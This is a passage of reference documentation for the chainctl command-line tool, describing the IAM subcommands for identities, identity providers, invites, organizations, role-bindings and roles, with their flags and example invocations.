--subject-pattern="^\d{4}$" --audience=some-audience Options --audience string The audience of the identity (optional). 
--audience-pattern string A pattern to match the audience of the identity (optional). --claim-pattern stringArray A comma-separated list of claim:pattern pairs of custom claims to match for this identity. --description string A description of the identity (optional). --expiration string The time when the issuer_keys will expire. Defaults to / Maximum of 30 days after creation time (yyyy-mm-dd). -h, --help help for update --identity-issuer string The issuer of the identity. --identity-issuer-pattern string A pattern to match the issuer of the identity. --issuer-keys string JWKS-formatted public keys for the issuer. --subject string The subject of the identity. --subject-pattern string A pattern to match the subject of the identity. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identities - Identity management. --- ### chainctl iam identity-providers URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identity-providers/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identity-providers customer managed identity provider management Options -h, --help help for identity-providers Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam - IAM related commands for the Chainguard platform. chainctl iam identity-providers create - Create an identity provider chainctl iam identity-providers delete - Delete an identity provider. chainctl iam identity-providers list - List identity providers. 
chainctl iam identity-providers update - Update an identity provider --- ### chainctl iam identity-providers create URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identity-providers_create/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identity-providers create Create an identity provider chainctl iam identity-providers create --parent ORGANIZATION_NAME | ORGANIZATION_ID [--name=NAME] [--description=DESCRIPTION] --oidc-issuer=ISSUER --oidc-client-id=CLIENTID --oidc-client-secret=CLIENTSECRET [--oidc-additional-scopes=SCOPE,...] --default-role=ROLE [--output=id|json|table] Examples # Setup a custom OIDC provider and bind new users to the viewer role chainctl iam identity-provider create --name=google --parent=example \ --oidc-issuer=https://accounts.google.com \ --oidc-client-id=foo \ --oidc-client-secret=bar \ --default-role=viewer Options --configuration-type string Type of identity provider. Only OIDC supported currently (default "OIDC") --default-role string Role to grant users on first login --description string Description of identity provider -h, --help help for create --name string Name of identity provider --oidc-additional-scopes stringArray additional scopes to request for OIDC type identity provider --oidc-client-id string client id for OIDC type identity provider --oidc-client-secret string client secret for OIDC type identity provider --oidc-issuer string Issuer URL for OIDC type identity provider --parent string The name or ID of the location the identity provider belongs to. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identity-providers - customer managed identity provider management --- ### chainctl iam identity-providers delete URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identity-providers_delete/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identity-providers delete Delete an identity provider. chainctl iam identity-providers delete IDENTITY_PROVIDER_ID|IDENTITY_PROVIDER_NAME [--yes] [--output=id] Examples # Delete an identity provider by ID chainctl iam identity-providers delete 9b6da6e64b45129eb4e9f9f3ce9b69ca2a550c6b/034e4afcda8c0b07 # Delete an identity provider by name chainctl iam identity-providers delete my-idp Options -h, --help help for delete -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. 
(default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identity-providers - customer managed identity provider management --- ### chainctl iam identity-providers list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identity-providers_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identity-providers list List identity providers. chainctl iam identity-providers list [--parent ORGANIZATION_NAME | ORGANIZATION_ID | FOLDER_NAME | FOLDER_ID] [--output=json|table|tree] Examples # List identity providers chainctl iam identity-providers list # Filter list by location chainctl iam identity-providers list --parent=my-org Options -h, --help help for list --parent string List identity providers in this location and its descendants. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identity-providers - customer managed identity provider management --- ### chainctl iam identity-providers update URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_identity-providers_update/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam identity-providers update Update an identity provider chainctl iam identity-providers update IDENTITY_PROVIDER_ID [--name=NAME] [--description=DESCRIPTION] [--oidc-issuer=ISSUER] [--oidc-client-id=CLIENTID] [--oidc-client-secret=CLIENTSECRET] [--oidc-additional-scopes=SCOPE,...] [--default-role=ROLE] [--output=id|json|table] Examples # Update name and description of an identity provider by ID chainctl iam identity-provider update fb694596eb1678321f94eec283e1e0be690f655c/a2973bac66ebfde3 --name=new-name --description=new-description # Update the default role for an identity provider by name chainctl iam identity-provider update my-idp --default=role=viewer Options --configuration-type string Type of identity provider. 
Only OIDC supported currently (default "OIDC") --default-role string Optional role to grant users on first login --description string Description of identity provider -h, --help help for update --name string Name of identity provider --oidc-additional-scopes stringArray additional scopes to request for OIDC type identity provider --oidc-client-id string client id for OIDC type identity provider --oidc-client-secret string client secret for OIDC type identity provider --oidc-issuer string Issuer URL for OIDC type identity provider -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam identity-providers - customer managed identity provider management --- ### chainctl iam invites URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_invites/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam invites Manage invite codes that register identities with Chainguard. Options -h, --help help for invites Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam - IAM related commands for the Chainguard platform. chainctl iam invites create - Generate an invite code to register identities with Chainguard. chainctl iam invites delete - Delete invite codes. chainctl iam invites list - List organization and folder invites. --- ### chainctl iam invites create URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_invites_create/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam invites create Generate an invite code to register identities with Chainguard.
chainctl iam invites create [ORGANIZATION_NAME | ORGANIZATION_ID | FOLDER_NAME | FOLDER_ID] [--role=ROLE_ID|ROLE_NAME] [--ttl=TTL_DURATION] [--email=EMAIL] [--single-use] [--output=id|json|table] Examples # Create an invite that will be valid for 5 days: chainctl iam invite create my-org-name --role=viewer --ttl=5d # Create an invite that only Kim can accept: chainctl iam invite create my-org-name --email=kim@example.com # Create an invite code that can only be used once. chainctl iam invite create my-org-name --single-use Options --email string The email address that is allowed to accept this invite code. -h, --help help for create --role string Role is used to role-bind the invited to the associated location. --single-use The invite can only be used once before it is invalidated. --ttl duration Duration the invite code will be valid. (default 168h0m0s) Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam invites - Manage invite codes that register identities with Chainguard. --- ### chainctl iam invites delete URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_invites_delete/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam invites delete Delete invite codes chainctl iam invites delete {INVITE_ID... | --expired} [--yes] [flags] Options --expired When true, delete all expired invite codes. -h, --help help for delete -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam invites - Manage invite codes that register identities with Chainguard. --- ### chainctl iam invites list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_invites_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam invites list List organization and folder invites. 
chainctl iam invites list [--parent ORGANIZATION_NAME | ORGANIZATION_ID | FOLDER_NAME | FOLDER_ID] [--output=id|json|table] Examples # List all accessible invites chainctl iam invites list # Filter invites by location chainctl iam invites list --parent=my-org Options -h, --help help for list --parent string List invites from this location. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam invites - Manage invite codes that register identities with Chainguard. --- ### chainctl iam organizations URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_organizations/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam organizations IAM organization interactions. Options -h, --help help for organizations Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam - IAM related commands for the Chainguard platform. chainctl iam organizations delete - Delete an organization. chainctl iam organizations describe - Describe an organization. chainctl iam organizations list - List organizations. --- ### chainctl iam organizations delete URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_organizations_delete/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam organizations delete Delete an organization. chainctl iam organizations delete [ORGANIZATION_NAME | ORGANIZATION_ID] [--skip-refresh] [--yes] Examples # Delete an organization by ID chainctl iam organizations delete e533448ca9770c46f99f2d86d60fc7101494e4a3 # Delete an organization by name chainctl iam organizations delete my-org # Delete an organization to be selected interactively chainctl iam organizations delete Options -h, --help help for delete --skip-refresh Skips attempting to reauthenticate and refresh the Chainguard auth token if it becomes out of date. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. 
Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam organizations - IAM organization interactions. --- ### chainctl iam organizations describe URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_organizations_describe/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam organizations describe Describe an organization. chainctl iam organizations describe [ORGANIZATION_NAME | ORGANIZATION_ID] [--active-within=DURATION] [--output=json] Options --active-within duration How recently a record must have been active to be listed. Zero will return all records. (default 24h0m0s) -h, --help help for describe Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam organizations - IAM organization interactions. --- ### chainctl iam organizations list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_organizations_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam organizations list List organizations. chainctl iam organizations list [--output=id|json|table|tree] Options -h, --help help for list Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. 
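As a quick sketch of the output formats this command accepts (no flags beyond those documented above are assumed):

```sh
# List accessible organizations in the default table format
chainctl iam organizations list

# Print only organization IDs, convenient for piping into other chainctl commands
chainctl iam organizations list -o id

# Render the listing as a tree
chainctl iam organizations list -o tree
```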
SEE ALSO chainctl iam organizations - IAM organization interactions. --- ### chainctl iam role-bindings URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_role-bindings/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam role-bindings IAM role-bindings resource interactions. Options -h, --help help for role-bindings Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam - IAM related commands for the Chainguard platform. chainctl iam role-bindings create - Create a role-binding chainctl iam role-bindings delete - Delete a role-binding. chainctl iam role-bindings list - List role-bindings. chainctl iam role-bindings update - Update a role-binding. --- ### chainctl iam role-bindings create URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_role-bindings_create/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam role-bindings create Create a role-binding chainctl iam role-bindings create [--identity=IDENTITY] [--role=ROLE] [--parent ORGANIZATION_NAME | ORGANIZATION_ID | FOLDER_NAME | FOLDER_ID] [--output=id|json|table] Examples # Bind a user-created identity as viewer to a location chainctl iam role-bindings create --identity=guest-identity --role=viewer --parent=engineering # Create a new role-binding using interactive selection for identity, role, and location chainctl iam role-bindings create Options -h, --help help for create --identity string The name or ID of the identity to bind. --parent string The name or ID of the location the role-binding belongs to. --role string The name or ID of the role to bind to the identity. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam role-bindings - IAM role-bindings resource interactions. 
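As a scripting note (a sketch that reuses the example identity, role, and organization names from the Examples section above): passing the documented id output format prints only the identifier of the new role-binding, which can be captured in a shell variable for later use.

BINDING_ID=$(chainctl iam role-bindings create --identity=guest-identity --role=viewer --parent=engineering -o id)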
--- ### chainctl iam role-bindings delete URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_role-bindings_delete/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam role-bindings delete Delete a role-binding. chainctl iam role-bindings delete ROLE_BINDING_ID [--yes] [--output=id] Examples # Delete a role-binding chainctl iam role-bindings delete 9b6da6e64b45129eb4e9f9f3ce9b69ca2a550c6b/034e4afcda8c0b07/55b470f08e38b4d2 Options -h, --help help for delete -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam role-bindings - IAM role-bindings resource interactions. --- ### chainctl iam role-bindings list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_role-bindings_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam role-bindings list List role-bindings. chainctl iam role-bindings list [--parent ORGANIZATION_NAME | ORGANIZATION_ID | FOLDER_NAME | FOLDER_ID] [--output=json|table|tree] Examples # List role-bindings chainctl iam role-bindings list # Filter role-bindings by organization chainctl iam role-bindings list --parent=my-org Options -h, --help help for list --parent string List role-bindings from this location. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam role-bindings - IAM role-bindings resource interactions. --- ### chainctl iam role-bindings update URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_role-bindings_update/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam role-bindings update Update a role-binding. 
chainctl iam role-bindings update BINDING_ID [--role=ROLE] [--identity=IDENTITY] [--output=id|json|table] Examples # Update the role an identity is bound to chainctl iam role-bindings update fb694596eb1678321f94eec283e1e0be690f655c/a2973bac66ebfde3 --role=editor # Update the identity bound to a role chainctl iam role-bindings update fb694596eb1678321f94eec283e1e0be690f655c/a2973bac66ebfde3 --identity=support-identity Options -h, --help help for update --identity string The name or ID of the identity to bind. --role string The name or ID of the role to bind to the identity. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam role-bindings - IAM role-bindings resource interactions. --- ### chainctl iam roles URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_roles/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam roles IAM role resource interactions. Options -h, --help help for roles Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam - IAM related commands for the Chainguard platform. chainctl iam roles capabilities - IAM role capabilities chainctl iam roles create - Create an IAM role. chainctl iam roles delete - Delete a custom IAM role. chainctl iam roles list - List IAM roles. chainctl iam roles update - Update an IAM role. --- ### chainctl iam roles capabilities URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_roles_capabilities/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam roles capabilities IAM role capabilities Options -h, --help help for capabilities Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. 
(default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam roles - IAM role resource interactions. chainctl iam roles capabilities list - List IAM role capabilities. --- ### chainctl iam roles capabilities list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_roles_capabilities_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam roles capabilities list List IAM role capabilities. chainctl iam roles capabilities list [--actions=ACTION,...] [--resources=RESOURCE,...] [--output=json|table|tree] Examples # List all capabilities chainctl iam roles capabilities list # List all capabilities for groups and repos chainctl iam roles capabilities list --resources=groups,repos # List all capabilities that include list chainctl iam roles capabilities list --actions=list Options --actions strings Capability actions to list. -h, --help help for list --resources strings Capability resources to list. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam roles capabilities - IAM role capabilities --- ### chainctl iam roles create URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_roles_create/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam roles create Create an IAM role. chainctl iam roles create ROLE_NAME --parent ORGANIZATION_NAME | ORGANIZATION_ID | FOLDER_NAME | FOLDER_ID --capabilities=CAPABILITY,... [--description=DESCRIPTION] [--yes] [--output=id|json|table] Examples # Create a role chainctl iam roles create my-role --parent=engineering --capabilities=policy.list,groups.list # Create a role and choose parameters interactively chainctl iam roles create my-role Options --capabilities strings A comma separated list of capabilities to grant this role. --description string A description of the role. -h, --help help for create --parent string Location to create this role under. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. 
(default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam roles - IAM role resource interactions. --- ### chainctl iam roles delete URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_roles_delete/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam roles delete Delete a custom IAM role. chainctl iam roles delete ROLE_NAME|ROLE_ID [--yes] [--output=id|json|table] Examples # Delete a role by ID chainctl iam roles delete 3ed98fc... Options -h, --help help for delete -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam roles - IAM role resource interactions. --- ### chainctl iam roles list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_roles_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam roles list List IAM roles. chainctl iam roles list [--name=NAME] 